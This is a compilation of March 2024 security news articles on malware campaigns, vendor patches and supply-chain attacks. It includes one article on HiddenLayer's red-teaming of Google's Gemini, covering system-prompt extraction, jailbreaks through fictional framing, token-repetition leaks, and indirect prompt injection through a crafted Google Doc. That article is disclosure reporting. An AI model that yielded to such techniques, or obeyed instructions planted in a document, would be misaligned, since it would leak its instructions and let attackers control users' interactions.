"This case underscores the ongoing and active threat posed by Earth Kapre, a threat actor that targets a diverse range of industries across multiple countries," Trend Micro said.
"The actor employs sophisticated tactics, such as abusing PowerShell, curl, and Program Compatibility Assistant (pcalua.exe) to execute malicious commands, showcasing its dedication to evading detection within targeted networks."
The development comes as the Russian nation-state group known as Turla (aka Iron Hunter, Pensive Ursa, Secret Blizzard, Snake, Uroburos, Venomous Bear, and Waterbug) has begun employing a new wrapper DLL codenamed Pelmeni to deploy the .NET-based Kazuar backdoor.
Pelmeni – which masquerades as libraries related to SkyTel, NVIDIA GeForce Experience, vncutil, or ASUS – is loaded by means of DLL side-loading. Once this spoofed DLL is called by the legitimate software installed on the machine, it decrypts and launches Kazuar, Lab52 said.
Ande Loader Malware Targets Manufacturing Sector in North America
14.3.24
Virus
The Hacker News
The threat actor known as Blind
Eagle has been observed using a loader malware called Ande Loader to deliver
remote access trojans (RATs) like Remcos RAT and NjRAT.
The attacks, which take the form of phishing emails, targeted Spanish-speaking users in the manufacturing industry based in North America, eSentire said.
Blind Eagle (aka APT-C-36) is a financially motivated threat actor that has a history of orchestrating cyber attacks against entities in Colombia and Ecuador to deliver an assortment of RATs, including AsyncRAT, BitRAT, Lime RAT, NjRAT, Remcos RAT, and Quasar RAT.
The latest findings mark an expansion of the threat actor's targeting footprint, while also leveraging phishing bearing RAR and BZ2 archives to activate the infection chain.
The password-protected RAR archives come with a malicious Visual Basic Script (VBScript) file that's responsible for establishing persistence in the Windows Startup folder and launching the Ande Loader, which, in turn, loads the Remcos RAT payload.
In an alternative attack sequence observed by the Canadian cybersecurity firm, a BZ2 archive containing a VBScript file is distributed via a Discord content delivery network (CDN) link. The Ande Loader malware, in this case, drops NjRAT instead of Remcos RAT.
"Blind Eagle threat actor(s) have been using crypters written by Roda and Pjoao1578," eSentire said. "One of the crypters developed by Roda has the hardcoded server hosting both injector components of the crypter and additional malware that was used in the Blind Eagle campaign."
The development comes as SonicWall shed light on the inner workings of another loader malware family called DBatLoader, detailing its use of a legitimate-but-vulnerable driver associated with RogueKiller AntiMalware software (truesight.sys) to terminate security software as part of a Bring Your Own Vulnerable Driver (BYOVD) attack and ultimately deliver Remcos RAT.
"The malware is received inside an archive as an email attachment and is highly obfuscated, containing multiple layers of encryption data," the company noted earlier this month.
DarkGate Malware Exploits Recently Patched Microsoft Flaw in Zero-Day Attack
14.3.24
Vulnerebility
The Hacker News
A DarkGate malware campaign observed in mid-January 2024 leveraged a recently patched security flaw in Microsoft Windows as a zero-day using bogus software installers.
"During this campaign, users were lured using PDFs that contained Google DoubleClick Digital Marketing (DDM) open redirects that led unsuspecting victims to compromised sites hosting the Microsoft Windows SmartScreen bypass CVE-2024-21412 that led to malicious Microsoft (.MSI) installers," Trend Micro said.
CVE-2024-21412 (CVSS score: 8.1) concerns an internet shortcut files security feature bypass vulnerability that permits an unauthenticated attacker to circumvent SmartScreen protections by tricking a victim into clicking on a specially crafted file.
It was fixed by Microsoft as part of its Patch Tuesday updates for February 2024, but not before it was weaponized by a threat actor called Water Hydra (aka DarkCasino) to deliver the DarkMe malware in attacks targeting financial institutions.
The latest findings from Trend Micro show that the vulnerability has come under broader exploitation than previously thought, with the DarkGate campaign leveraging it in conjunction with open redirects from Google Ads to proliferate the malware.
The sophisticated attack chain begins with victims clicking on a link embedded within a PDF attachment sent via a phishing email. The link deploys an open redirect from Google's doubleclick[.]net domain to a compromised web server hosting a malicious .URL internet shortcut file that exploits CVE-2024-21412.
Specifically, the open redirects are designed to distribute fake Microsoft software installers (.MSI) masquerading as legitimate software, such as Apple iTunes, Notion, NVIDIA, which come fitted with a side-loaded DLL file that decrypted and infected users with DarkGate (version 6.1.7).
It's worth noting that another now-fixed bypass flaw in Windows SmartScreen (CVE-2023-36025, CVSS score: 8.8) has been employed by threat actors to deliver DarkGate, Phemedrone Stealer, and Mispadu over the past few months.
The abuse of Google Ads technologies allows threat actors to increase the reach and scale of their attacks through different ad campaigns that are tailored for specific audiences.
"Using fake software installers, along with open redirects, is a potent combination and can lead to many infections," security researchers Peter Girnus, Aliakbar Zahravi, and Simon Zuckerbraun said. "It is essential to remain vigilant and to instruct users not to trust any software installer that they receive outside of official channels."
The development comes as the AhnLab Security Intelligence Center (ASEC) and
eSentire revealed that counterfeit installers for Adobe Reader, Notion and
Synaptics are being distributed via fake PDF files and seemingly legitimate
websites to deploy information stealers like LummaC2 and the XRed backdoor.
It also follows the discovery of new stealer malware families like Planet Stealer, Rage Stealer (aka xStealer), and Tweaks (aka Tweaker), adding to the plethora of cyber threats that are capable of harvesting sensitive information from compromised hosts.
"Attackers are exploiting popular platforms, like YouTube and Discord, to distribute Tweaks to Roblox users, capitalizing on the ability of legitimate platforms to evade detection by web filter block lists that typically block known malicious servers," Zscaler ThreatLabz said.
"Attackers share malicious files disguised as Frames Per Second (FPS) optimization packages with users and, in turn, users infect their own systems with Tweaks malware."
The PowerShell-based stealer is equipped to exfiltrate sensitive data, including user information, location, Wi-Fi profiles, passwords, Roblox IDs, and in-game currency details, to an attacker-controlled server via a Discord webhook.
Malvertising and social engineering campaigns have also been observed acting as an initial access vector to disseminate a wide range of stealer and remote access trojans like Agent Tesla, CyberGate RAT, Fenix botnet, Matanbuchus, NarniaRAT, Remcos RAT, Rhadamanthys, SapphireStealer, and zgRAT.
Fortinet Warns of Severe SQLi Vulnerability in FortiClientEMS Software
14.3.24
Vulnerebility
The Hacker News
Fortinet has warned of a critical
security flaw impacting its FortiClientEMS software that could allow attackers
to achieve code execution on affected systems.
"An improper neutralization of special elements used in an SQL Command ('SQL Injection') vulnerability [CWE-89] in FortiClientEMS may allow an unauthenticated attacker to execute unauthorized code or commands via specifically crafted requests," the company said in an advisory.
The vulnerability, tracked as CVE-2023-48788, carries a CVSS rating of 9.3 out of a maximum of 10. It impacts the following versions -
FortiClientEMS 7.2.0 through 7.2.2 (Upgrade to 7.2.3 or above)
FortiClientEMS
7.0.1 through 7.0.10 (Upgrade to 7.0.11 or above)
Horizon3.ai, which plans to
release additional technical details and a proof-of-concept (PoC) exploit next
week, said the shortcoming could be exploited to obtain remote code execution as
SYSTEM on the server.
Fortinet has credited Thiago Santana From the ForticlientEMS development team and the U.K. National Cyber Security Centre (NCSC) for discovering and reporting the flaw.
Also fixed by the company two other critical bugs in FortiOS and FortiProxy (CVE-2023-42789 and CVE-2023-42790, CVSS scores: 9.3) that could permit an attacker with access to the captive portal to execute arbitrary code or commands via specially crafted HTTP requests.
The below product versions are impacted by the flaws -
FortiOS version 7.4.0 through 7.4.1 (Upgrade to FortiOS version 7.4.2 or above)
FortiOS version 7.2.0 through 7.2.5 (Upgrade to FortiOS version 7.2.6 or above)
FortiOS version 7.0.0 through 7.0.12 (Upgrade to FortiOS version 7.0.13 or
above)
FortiOS version 6.4.0 through 6.4.14 (Upgrade to FortiOS version
6.4.15 or above)
FortiOS version 6.2.0 through 6.2.15 (Upgrade to FortiOS
version 6.2.16 or above)
FortiProxy version 7.4.0 (Upgrade to FortiProxy
version 7.4.1 or above)
FortiProxy version 7.2.0 through 7.2.6 (Upgrade to
FortiProxy version 7.2.7 or above)
FortiProxy version 7.0.0 through 7.0.12
(Upgrade to FortiProxy version 7.0.13 or above)
FortiProxy version 2.0.0
through 2.0.13 (Upgrade to FortiProxy version 2.0.14 or above)
While there is
no evidence that the aforementioned flaws have come under active exploitation,
unpatched Fortinet appliances have been repeatedly abused by threat actors,
making it imperative that users move quickly to apply the updates.
PixPirate Android Banking Trojan Using New Evasion Tactic to Target Brazilian
Users
13.3.24
Virus
The Hacker News
The threat actors behind the
PixPirate Android banking trojan are leveraging a new trick to evade detection
on compromised devices and harvest sensitive information from users in Brazil.
The approach allows it to hide the malicious app's icon from the home screen of the victim's device, IBM said in a technical report published today.
"Thanks to this new technique, during PixPirate reconnaissance and attack phases, the victim remains oblivious to the malicious operations that this malware performs in the background," security researcher Nir Somech said.
PixPirate, which was first documented by Cleafy in February 2023, is known for its abuse of Android's accessibility services to covertly perform unauthorized fund transfers using the PIX instant payment platform when a targeted banking app is opened.
The constantly mutating malware is also capable of stealing victims' online banking credentials and credit card information, as well as capturing keystrokes and intercepting SMS messages to access two-factor authentication codes.
Typically distributed via SMS and WhatsApp, the attack flow entails the use of a dropper (aka downloader) app that's engineered to deploy the main payload (aka droppee) to pull off the financial fraud.
"Usually, the downloader is used to download and install the droppee, and from this point on, the droppee is the main actor conducting all fraudulent operations and the downloader is irrelevant," Somech explained.
"In the case of PixPirate, the downloader is responsible not only for downloading and installing the droppee but also for running and executing it. The downloader plays an active part in the malicious activities of the droppee as they communicate with each other and send commands to execute."
The downloader APK app, once launched, prompts the victim to update the app to either retrieve the PixPirate component from an actor-controlled server or install it if it's embedded within itself.
What's changed in the latest version of the droppee is the absence of activity
with the action "android.intent.action.Main" and the category
"android.intent.category.LAUNCHER" that allows a user to launch an app from the
home screen by tapping its icon.
Put differently, the infection chain requires both the downloader and the droppee to work in tandem, with the former responsible for running the PixPirate APK by binding to a service exported by the droppee.
"Later, to maintain persistence, the droppee is also triggered to run by the different receivers that it registered," Somech said. "The receivers are set to be activated based on different events that occur in the system and not necessarily by the downloader that initially triggered the droppee to run."
"This technique allows the PixPirate droppee to run and hide its existence even if the victim removes the PixPirate downloader from their device."
The development comes as Latin American (LATAM) banks have become the target of a new malware called Fakext that employs a rogue Microsoft Edge extension named SATiD to carry out man-in-the-browser and web injection attacks with the goal of grabbing credentials entered in the targeted bank site.
It's worth noting that SAT ID is a service offered by Mexico's Tax Administration Service (SAT) to generate and update electronic signatures for filing taxes online.
In select cases, Fakext is engineered to display an overlay that urges the victim to download a legitimate remote access tool by purporting to be the bank's IT support team, ultimately enabling the threat actors to conduct financial fraud.
The campaign – active since at least November 2023 – singles out 14 banks operating in the region, a majority of which are located in Mexico. The extension has since been taken down from the Edge Add-ons store.
Researchers Highlight Google's Gemini AI Susceptibility to LLM Threats
13.3.24
AI
The Hacker News
Google's Gemini large language
model (LLM) is susceptible to security threats that could cause it to divulge
system prompts, generate harmful content, and carry out indirect injection
attacks.
The findings come from HiddenLayer, which said the issues impact consumers using Gemini Advanced with Google Workspace as well as companies using the LLM API.
The first vulnerability involves getting around security guardrails to leak the system prompts (or a system message), which are designed to set conversation-wide instructions to the LLM to help it generate more useful responses, by asking the model to output its "foundational instructions" in a markdown block.
"A system message can be used to inform the LLM about the context," Microsoft notes in its documentation about LLM prompt engineering.
"The context may be the type of conversation it is engaging in, or the function it is supposed to perform. It helps the LLM generate more appropriate responses."
This is made possible due to the fact that models are susceptible to what's called a synonym attack to circumvent security defenses and content restrictions.
A second class of vulnerabilities relates to using "crafty jailbreaking" techniques to make the Gemini models generate misinformation surrounding topics like elections as well as output potentially illegal and dangerous information (e.g., hot-wiring a car) using a prompt that asks it to enter into a fictional state.
Also identified by HiddenLayer is a third shortcoming that could cause the LLM to leak information in the system prompt by passing repeated uncommon tokens as input.
"Most LLMs are trained to respond to queries with a clear delineation between the user's input and the system prompt," security researcher Kenneth Yeung said in a Tuesday report.
"By creating a line of nonsensical tokens, we can fool the LLM into believing it is time for it to respond and cause it to output a confirmation message, usually including the information in the prompt."
Another test involves using Gemini Advanced and a specially crafted Google document, with the latter connected to the LLM via the Google Workspace extension.
The instructions in the document could be designed to override the model's instructions and perform a set of malicious actions that enable an attacker to have full control of a victim's interactions with the model.
The disclosure comes as a group of academics from Google DeepMind, ETH Zurich, University of Washington, OpenAI, and the McGill University revealed a novel model-stealing attack that makes it possible to extract "precise, nontrivial information from black-box production language models like OpenAI's ChatGPT or Google's PaLM-2."
That said, it's worth noting that these vulnerabilities are not novel and are present in other LLMs across the industry. The findings, if anything, emphasize the need for testing models for prompt attacks, training data extraction, model manipulation, adversarial examples, data poisoning and exfiltration.
"To help protect our users from vulnerabilities, we consistently run red-teaming exercises and train our models to defend against adversarial behaviors like prompt injection, jailbreaking, and more complex attacks," a Google spokesperson told The Hacker News. "We've also built safeguards to prevent harmful or misleading responses, which we are continuously improving."
The company also said it's restricting responses to election-based queries out of an abundance of caution. The policy is expected to be enforced against prompts regarding candidates, political parties, election results, voting information, and notable office holders.
Alert: Cybercriminals Deploying VCURMS and STRRAT Trojans via AWS and GitHub
13.3.24
Virus
The Hacker News
A new phishing campaign has been observed delivering remote access trojans (RAT) such as VCURMS and STRRAT by means of a malicious Java-based downloader.
"The attackers stored malware on public services like Amazon Web Services (AWS) and GitHub, employing a commercial protector to avoid detection of the malware," Fortinet FortiGuard Labs researcher Yurren Wan said.
An unusual aspect of the campaign is VCURMS' use of a Proton Mail email address ("sacriliage@proton[.]me") for communicating with a command-and-control (C2) server.
The attack chain commences with a phishing email that urges recipients to click on a button to verify payment information, resulting in the download of a malicious JAR file ("Payment-Advice.jar") hosted on AWS.
Executing the JAR file leads to the retrieval of two more JAR files, which are then run separately to launch the twin trojans.
Besides sending an email with the message "Hey master, I am online" to the actor-controlled address, VCURMS RAT periodically checks the mailbox for emails with specific subject lines to extract the command to be executed from the body of the missive.
This includes running arbitrary commands using cmd.exe, gathering system information, searching and uploading files of interest, and downloading additional information stealer and keylogger modules from the same AWS endpoint.
The information stealer comes fitted with capabilities to siphon sensitive data from apps like Discord and Steam, credentials, cookies, and auto-fill data from various web browsers, screenshots, and extensive hardware and network information about the compromised hosts.
VCURMS is said to share similarities with another Java-based infostealer codenamed Rude Stealer, which emerged in the wild late last year. STRRAT, on the other hand, has been detected in the wild since at least 2020, often propagated in the form of fraudulent JAR files.
"STRRAT is a RAT built using Java, which has a wide range of capabilities, such as serving as a keylogger and extracting credentials from browsers and applications," Wan noted.
The disclosure comes as Darktrace revealed a novel phishing campaign that's taking advantage of automated emails sent from the Dropbox cloud storage service via "no-reply@dropbox[.]com" to propagate a bogus link mimicking the Microsoft 365 login page.
"The email itself contained a link that would lead a user to a PDF file hosted on Dropbox, that was seemingly named after a partner of the organization," the company said. "the PDF file contained a suspicious link to a domain that had never previously been seen on the customer's environment, 'mmv-security[.]top.'"
Microsoft's March Updates Fix 61 Vulnerabilities, Including Critical Hyper-V
Flaws
13.3.24
Vulnerebility
The Hacker News
Microsoft on Tuesday released its
monthly security update, addressing 61 different security flaws spanning its
software, including two critical issues impacting Windows Hyper-V that could
lead to denial-of-service (DoS) and remote code execution.
Of the 61 vulnerabilities, two are rated Critical, 58 are rated Important, and one is rated Low in severity. None of the flaws are listed as publicly known or under active attack at the time of the release, but six of them have been tagged with an "Exploitation More Likely" assessment.
The fixes are in addition to 17 security flaws that have been patched in the company's Chromium-based Edge browser since the release of the February 2024 Patch Tuesday updates.
Topping the list of critical shortcomings are CVE-2024-21407 and CVE-2024-21408, which affect Hyper-V and could result in remote code execution and a DoS condition, respectively.
Microsoft's update also addresses privilege escalation flaws in the Azure Kubernetes Service Confidential Container (CVE-2024-21400, CVSS score: 9.0), Windows Composite Image File System (CVE-2024-26170, CVSS score: 7.8), and Authenticator (CVE-2024-21390, CVSS score: 7.1).
Successful exploitation of CVE-2024-21390 requires the attacker to have a local presence on the device either via malware or a malicious application already installed via some other means. It also necessitates that the victim closes and re-opens the Authenticator app.
"Exploitation of this vulnerability could allow an attacker to gain access to multi-factor authentication codes for the victim's accounts, as well as modify or delete accounts in the authenticator app but not prevent the app from launching or running," Microsoft said in an advisory.
"While exploitation of this flaw is considered less likely, we know that attackers are keen to find ways to bypass multi-factor authentication," Satnam Narang, senior staff research engineer at Tenable, said in a statement shared with The Hacker News.
"Having access to a target device is bad enough as they can monitor keystrokes, steal data and redirect users to phishing websites, but if the goal is to remain stealth, they could maintain this access and steal multi-factor authentication codes in order to login to sensitive accounts, steal data or hijack the accounts altogether by changing passwords and replacing the multi-factor authentication device, effectively locking the user out of their accounts."
Another vulnerability of note is a privilege escalation bug in the Print Spooler component (CVE-2024-21433, CVSS score: 7.0) that could permit an attacker to obtain SYSTEM privileges but only upon winning a race condition.
The update also plugs a remote code execution flaw in Exchange Server (CVE-2024-26198, CVSS score: 8.8) that an unauthenticated threat actor could abuse by placing a specially crafted file onto an online directory and tricking a victim into opening it, resulting in the execution of malicious DLL files.
The vulnerability with the highest CVSS rating is CVE-2024-21334 (CVSS score: 9.8), which concerns a case of remote code execution affecting the Open Management Infrastructure (OMI).
"A remote unauthenticated attacker could access the OMI instance from the Internet and send specially crafted requests to trigger a use-after-free vulnerability," Redmond said.
Cybersecurity
"The first quarter of Patch Tuesday in 2024 has been quieter
compared to the last four years," Narang said. "On average, there were 237 CVEs
patched in the first quarter from 2020 through 2023. In the first quarter of
2024, Microsoft only patched 181 CVEs. The average number of CVEs patched in
March over the last four years was 86."
This month's patches are oddly "light". We have patches for 60 vulnerabilities and 4 Chromium patches affecting Microsoft Edge. But only two of the vulnerabilities are rated as "Critical":
CVE-2024-21408: Windows Hyper-V Denial of Service Vulnerability
CVE-2024-21407: Windows Hyper-V Remote Code Execution Vulnerability
Oddly, Microsoft considers a DoS vulnerability "critical". However, a DoS against Hyper-V could have a significant impact, which may justify the rating. The code execution vulnerability justifies a rating of critical. However, exploitation requires an attacker to first gain a foothold inside a virtual machine.
Other vulnerabilities of interest:
CVE-2024-26198: A remote code execution vulnerability for Exchange Server. This is a DLL loading issue that is typically more difficult to exploit. Authentication is required to exploit the vulnerability.
Overall, this Patch Tuesday doesn't look too bad. Follow your normal patch management process. There is no need to get all worked up; tomorrow morning: Have some coffee, test... and later deploy once the tests are completed successfully.
Description | |||||||
---|---|---|---|---|---|---|---|
CVE | Disclosed | Exploited | Exploitability (old versions) | current version | Severity | CVSS Base (AVG) | CVSS Temporal (AVG) |
.NET and Visual Studio Denial of Service Vulnerability | |||||||
No | No | - | - | Important | 7.5 | 6.7 | |
Azure Data Studio Elevation of Privilege Vulnerability | |||||||
No | No | - | - | Important | 7.3 | 7.0 | |
Azure SDK Spoofing Vulnerability | |||||||
No | No | - | - | Important | 7.5 | 6.5 | |
Chromium: CVE-2024-2173 Out of bounds memory access in V8 | |||||||
No | No | - | - | - |
|
| |
Chromium: CVE-2024-2174 Inappropriate implementation in V8 | |||||||
No | No | - | - | - |
|
| |
Chromium: CVE-2024-2176 Use after free in FedCM | |||||||
No | No | - | - | - |
|
| |
Hypervisor-Protected Code Integrity (HVCI) Security Feature Bypass Vulnerability | |||||||
No | No | - | - | Important | 7.8 | 6.8 | |
Intel: CVE-2023-28746 Register File Data Sampling (RFDS) | |||||||
No | No | - | - | Important |
|
| |
Microsoft AllJoyn API Denial of Service Vulnerability | |||||||
No | No | - | - | Important | 7.5 | 6.5 | |
Microsoft Authenticator Elevation of Privilege Vulnerability | |||||||
No | No | - | - | Important | 7.1 | 6.2 | |
Microsoft Azure Kubernetes Service Confidential Container Elevation of Privilege Vulnerability | |||||||
No | No | - | - | Important | 9.0 | 8.1 | |
Microsoft Defender Security Feature Bypass Vulnerability | |||||||
No | No | - | - | Important | 5.5 | 4.8 | |
Microsoft Django Backend for SQL Server Remote Code Execution Vulnerability | |||||||
No | No | - | - | Important | 8.8 | 7.7 | |
Microsoft Dynamics 365 (on-premises) Cross-site Scripting Vulnerability | |||||||
No | No | - | - | Important | 7.6 | 6.6 | |
Microsoft Edge for Android Spoofing Vulnerability | |||||||
No | No | Less Likely | Less Likely | - | 4.3 | 3.8 | |
Microsoft Exchange Server Remote Code Execution Vulnerability | |||||||
No | No | - | - | Important | 8.8 | 7.7 | |
Microsoft Intune Linux Agent Elevation of Privilege Vulnerability | |||||||
No | No | - | - | Important | 6.6 | 5.9 | |
Microsoft ODBC Driver Remote Code Execution Vulnerability | |||||||
No | No | - | - | Important | 8.8 | 7.7 | |
No | No | - | - | Important | 8.8 | 7.7 | |
No | No | - | - | Important | 8.8 | 7.7 | |
No | No | - | - | Important | 8.8 | 7.7 | |
Microsoft Office Elevation of Privilege Vulnerability | |||||||
No | No | - | - | Important | 7.8 | 6.8 | |
Microsoft QUIC Denial of Service Vulnerability | |||||||
No | No | - | - | Important | 7.5 | 6.5 | |
Microsoft SharePoint Server Remote Code Execution Vulnerability | |||||||
No | No | - | - | Important | 7.8 | 6.8 | |
Microsoft Teams for Android Information Disclosure Vulnerability | |||||||
No | No | - | - | Important | 5.0 | 4.4 | |
Microsoft WDAC OLE DB provider for SQL Server Remote Code Execution Vulnerability | |||||||
No | No | - | - | Important | 8.8 | 7.7 | |
No | No | - | - | Important | 8.8 | 7.7 | |
No | No | - | - | Important | 8.8 | 7.7 | |
No | No | - | - | Important | 8.8 | 7.7 | |
No | No | - | - | Important | 8.8 | 7.7 | |
Microsoft Windows SCSI Class System File Elevation of Privilege Vulnerability | |||||||
No | No | - | - | Important | 7.8 | 6.8 | |
NTFS Elevation of Privilege Vulnerability | |||||||
No | No | - | - | Important | 7.8 | 6.8 | |
Open Management Infrastructure (OMI) Elevation of Privilege Vulnerability | |||||||
No | No | - | - | Important | 7.8 | 7.0 | |
Open Management Infrastructure (OMI) Remote Code Execution Vulnerability | |||||||
No | No | - | - | Important | 9.8 | 8.5 | |
Outlook for Android Information Disclosure Vulnerability | |||||||
No | No | - | - | Important | 7.5 | 6.5 | |
Skype for Consumer Remote Code Execution Vulnerability | |||||||
No | No | - | - | Important | 8.8 | 7.7 | |
Software for Open Networking in the Cloud (SONiC) Elevation of Privilege Vulnerability | |||||||
No | No | - | - | Important | 7.8 | 6.8 | |
Visual Studio Code Elevation of Privilege Vulnerability | |||||||
No | No | - | - | Important | 8.8 | 7.7 | |
Windows Cloud Files Mini Filter Driver Information Disclosure Vulnerability | |||||||
No | No | - | - | Important | 5.5 | 4.8 | |
Windows Composite Image File System (CimFS) Elevation of Privilege Vulnerability | |||||||
No | No | - | - | Important | 7.8 | 6.8 | |
Windows Compressed Folder Tampering Vulnerability | |||||||
No | No | - | - | Important | 6.5 | 5.7 | |
Windows Error Reporting Service Elevation of Privilege Vulnerability | |||||||
No | No | - | - | Important | 7.8 | 6.8 | |
Windows Graphics Component Elevation of Privilege Vulnerability | |||||||
No | No | - | - | Important | 7.8 | 6.8 | |
Windows Hyper-V Denial of Service Vulnerability | |||||||
No | No | - | - | Critical | 5.5 | 4.8 | |
Windows Hyper-V Remote Code Execution Vulnerability | |||||||
No | No | - | - | Critical | 8.1 | 7.1 | |
Windows Installer Elevation of Privilege Vulnerability | |||||||
No | No | - | - | Important | 7.8 | 6.8 | |
Windows Kerberos Security Feature Bypass Vulnerability | |||||||
No | No | - | - | Important | 7.5 | 6.5 | |
Windows Kernel Denial of Service Vulnerability | |||||||
No | No | - | - | Important | 5.5 | 4.8 | |
Windows Kernel Elevation of Privilege Vulnerability | |||||||
No | No | - | - | Important | 7.3 | 6.4 | |
No | No | - | - | Important | 7.8 | 6.8 | |
No | No | - | - | Important | 7.8 | 6.8 | |
No | No | - | - | Important | 7.8 | 6.8 | |
No | No | - | - | Important | 7.8 | 6.8 | |
Windows Kernel Information Disclosure Vulnerability | |||||||
No | No | - | - | Important | 5.5 | 4.8 | |
No | No | - | - | Important | 5.5 | 4.8 | |
Windows OLE Remote Code Execution Vulnerability | |||||||
No | No | - | - | Important | 8.8 | 7.7 | |
Windows Print Spooler Elevation of Privilege Vulnerability | |||||||
No | No | - | - | Important | 7.0 | 6.1 | |
Windows Standards-Based Storage Management Service Denial of Service Vulnerability | |||||||
No | No | - | - | Important | 6.5 | 5.7 | |
Windows Telephony Server Elevation of Privilege Vulnerability | |||||||
No | No | - | - | Important | 7.0 | 6.1 | |
Windows USB Attached SCSI (UAS) Protocol Remote Code Execution Vulnerability | |||||||
No | No | - | - | Important | 5.7 | 5.1 | |
Windows USB Hub Driver Remote Code Execution Vulnerability | |||||||
No | No | - | - | Important | 6.8 | 5.9 | |
Windows USB Print Driver Elevation of Privilege Vulnerability | |||||||
No | No | - | - | Important | 7.8 | 6.8 | |
No | No | - | - | Important | 7.0 | 6.1 | |
Windows Update Stack Elevation of Privilege Vulnerability | |||||||
No | No | - | - | Important | 7.0 | 6.1 |
Watch Out: These PyPI Python Packages Can Drain Your Crypto Wallets
12.3.24
Cryptocurrency
The Hacker News
Threat hunters have discovered a set of seven packages on
the Python Package Index (PyPI) repository that are designed to steal BIP39
mnemonic phrases used for recovering private keys of a cryptocurrency wallet.
The software supply chain attack campaign has been codenamed BIPClip by ReversingLabs. The packages were collectively downloaded 7,451 times prior to them being removed from PyPI. The list of packages is as follows -
jsBIP39-decrypt (126 downloads)
bip39-mnemonic-decrypt (689 downloads)
mnemonic_to_address (771 downloads)
erc20-scanner (343 downloads)
public-address-generator (1,005 downloads)
hashdecrypt (4,292 downloads)
hashdecrypts (225 downloads)
BIPClip, which is aimed at developers working on
projects related to generating and securing cryptocurrency wallets, is said to
be active since at least December 4, 2022, when hashdecrypt was first published
to the registry.
"This is just the latest software supply chain campaign to target crypto assets," security researcher Karlo Zanki said in a report shared with The Hacker News. "It confirms that cryptocurrency continues to be one of the most popular targets for supply chain threat actors."
In a sign that the threat actors behind the campaign were careful to avoid detection, one of the packages in question -- mnemonic_to_address -- was devoid of any malicious functionality, barring listing bip39-mnemonic-decrypt as its dependency, which contained the malicious component.
"Even if they did opt to look at the package's dependencies, the name of the imported module and invoked function are carefully chosen to mimic legitimate functions and not raise suspicion, since implementations of the BIP39 standard include many cryptographic operations," Zanki explained.
The package, for its part, is designed to steal mnemonic phrases and exfiltrate the information to an actor-controlled server.
Two other packages identified by ReversingLabs – public-address-generator and erc20-scanner – operate in an analogous fashion, with the former acting as a lure to transmit the mnemonic phrases to the same command-and-control (C2) server.
On the other hand, hashdecrypts functions a little differently in that it's not conceived to work as a pair and contains within itself near-identical code to harvest the data.
The package, per the software supply chain security firm, includes references to a GitHub profile named "HashSnake," which features a repository called hCrypto that's advertised as a way to extract mnemonic phrases from crypto wallets using the package hashdecrypts.
A closer examination of the repository's commit history reveals that the campaign has been underway for over a year based on the fact that one of the Python scripts previously imported the hashdecrypt (without the "s") package instead of hashdecrypts until March 1, 2024, the same date hashdecrypts was uploaded to PyPI.
It's worth pointing out that the threat actors behind the HashSnake account also have a presence on Telegram and YouTube to advertise their warez. This includes releasing a video on September 7, 2022, showcasing a crypto logs checker tool dubbed xMultiChecker 2.0.
"The content of each of the discovered packages was carefully crafted to make them look less suspicious," Zanki said.
"They were laser focused on compromising crypto wallets and stealing the crypto currencies they contained. That absence of a broader agenda and ambitions made it less likely this campaign would trip up security and monitoring tools deployed within compromised organizations."
The findings once again underscore the security threats that lurk within open-source package repositories, which is exacerbated by the fact that legitimate services like GitHub are used as a conduit to distribute malware.
Furthermore, abandoned projects are becoming an attractive vector for threat actors to seize control of the developer accounts and publish trojanized versions that could then pave the way for large-scale supply chain attacks.
"Abandoned digital assets are not relics of the past; they are ticking time
bombs and attackers have been increasingly taking advantage of them,
transforming them into trojan horses within the open-source ecosystems,"
Checkmarx noted last month.
"MavenGate and CocoaPods case studies highlight how abandoned domains and subdomains could be hijacked to mislead users and spread malicious intent."
Malware Campaign Exploits Popup Builder WordPress Plugin to Infect 3,900+ Sites
12.3.24
Virus
The Hacker News
A new malware campaign is leveraging a high-severity
security flaw in the Popup Builder plugin for WordPress to inject malicious
JavaScript code.
According to Sucuri, the campaign has infected more than 3,900 sites over the past three weeks.
"These attacks are orchestrated from domains less than a month old, with registrations dating back to February 12th, 2024," security researcher Puja Srivastava said in a report dated March 7.
Infection sequences involve the exploitation of CVE-2023-6000, a security vulnerability in Popup Builder that could be exploited to create rogue admin users and install arbitrary plugins.
The shortcoming was exploited as part of a Balada Injector campaign earlier this January, compromising no less than 7,000 sites.
The latest set of attacks lead to the injection of malicious code, which comes in two different variants and is designed to redirect site visitors to other sites such as phishing and scam pages.
WordPress site owners are recommended to keep their plugins up-to-date as well as scan their sites for any suspicious code or users, and perform appropriate cleanup.
"This new malware campaign serves as a stark reminder of the risks of not keeping your website software patched and up-to-date," Srivastava said.
The development comes as WordPress security firm Wordfence disclosed a high-severity bug in another plugin known as Ultimate Member that can be weaponized to inject malicious web scripts.
The cross-site scripting (XSS) flaw, tracked as CVE-2024-2123 (CVSS score: 7.2), impacts all versions of the plugin, including and prior to 2.8.3. It has been patched in version 2.8.4, released on March 6, 2024.
The flaw stems from insufficient input sanitization and output escaping, thereby allowing unauthenticated attackers to inject arbitrary web scripts in pages that will be executed every time a user visits them.
"Combined with the fact that the vulnerability can be exploited by attackers with no privileges on a vulnerable site, this means that there is a high chance that unauthenticated attackers could gain administrative user access on sites running the vulnerable version of the plugin when successfully exploited," Wordfence said.
It's worth noting that the plugin maintainers addressed a similar flaw (CVE-2024-1071, CVSS score: 9.8) in version 2.8.3 released on February 19.
It also follows the discovery of an arbitrary file upload vulnerability in the Avada WordPress theme (CVE-2024-1468, CVSS score: 8.8) and possibly executes malicious code remotely. It has been resolved in version 7.11.5.
"This makes it possible for authenticated attackers, with contributor-level access and above, to upload arbitrary files on the affected site's server which may make remote code execution possible," Wordfence said.
South Korean Citizen Detained in Russia on Cyber Espionage Charges
12.3.24
BigBrothers
The Hacker News
Russia has detained a South Korean national for the first time on cyber espionage charges and transferred from Vladivostok to Moscow for further investigation.
The development was first reported by Russian news agency TASS.
"During the investigation of an espionage case, a South Korean citizen Baek Won-soon was identified and detained in Vladivostok, and put into custody under a court order," an unnamed source was quoted as saying.
Won-soon has been accused of handing over classified "top secret" information to unnamed foreign intelligence agencies.
According to the agency, Won-soon was detained in Vladivostok earlier this year and shifted to Moscow late last month. He is said to be currently at the Lefortovo pretrial detention center. His arrest has been extended for another three months, until June 15, 2024.
The detention center is currently also the place where American journalist Evan Gershkovich is being held, awaiting trial on suspicion of espionage. Gershkovich has denied the charges.
The development comes amid burgeoning geopolitical ties between Russia and North Korea, even as state-sponsored hacking groups associated with the latter have targeted the Kremlin to pursue their strategic intelligence-gathering missions.
